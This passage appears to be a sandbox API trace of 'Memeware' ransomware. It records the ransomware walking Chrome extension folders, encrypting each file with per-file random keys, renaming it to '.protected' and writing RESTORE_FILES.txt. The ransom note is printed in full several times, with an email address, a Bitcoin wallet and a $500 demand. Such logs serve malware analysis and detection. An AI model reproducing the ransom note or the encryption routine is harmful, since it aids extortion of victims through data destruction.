data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.583] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.583] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.583] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.583] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.583] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.583] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.583] CloseHandle (hObject=0x164) returned 1 [0080.583] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.584] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0080.584] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0080.584] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0080.584] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0080.584] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0080.584] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt") returned 141 [0080.584] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0080.584] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0080.584] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\*") returned 143 [0080.584] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.584] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.584] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.584] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.584] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.584] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.584] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\.") returned 143 [0080.585] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.585] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.585] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.585] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.585] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.585] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.585] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.585] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\..") returned 144 [0080.585] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.585] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.585] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.585] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.585] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.585] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.585] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.585] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.585] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json") returned 155 [0080.585] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.585] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.585] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.585] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json") returned 155 [0080.586] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json") returned 155 [0080.586] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json") returned 155 [0080.586] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.586] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.587] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.587] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0080.587] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.587] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.587] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.587] CloseHandle (hObject=0x168) returned 1 [0080.587] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.protected") returned 165 [0080.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\messages.json.protected")) returned 1 [0080.588] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.588] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.588] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\RESTORE_FILES.txt") returned 159 [0080.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.588] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.588] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.589] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.589] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.589] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.589] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.589] CloseHandle (hObject=0x164) returned 1 [0080.589] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.589] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0080.589] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0080.589] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0080.589] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0080.589] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0080.589] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv") returned 141 [0080.589] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0080.589] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0080.589] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\*") returned 143 [0080.589] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.590] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.590] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.590] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.590] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.590] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.590] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\.") returned 143 [0080.590] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.590] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.590] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.590] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.590] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.590] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.590] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.590] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\..") returned 144 [0080.590] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.590] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.590] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.590] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.590] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.590] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.590] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.590] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.590] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json") returned 155 [0080.590] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.590] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.590] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.590] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json") returned 155 [0080.591] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json") returned 155 [0080.591] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json") returned 155 [0080.591] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.591] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc6, lpOverlapped=0x0) returned 1 [0080.592] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.592] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc6, lpOverlapped=0x0) returned 1 [0080.592] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.592] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.592] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.592] CloseHandle (hObject=0x168) returned 1 [0080.592] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.protected") returned 165 [0080.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\messages.json.protected")) returned 1 [0080.593] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.593] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.593] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\RESTORE_FILES.txt") returned 159 [0080.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.594] lstrlenA (lpString="! SYSTEM SECURITY 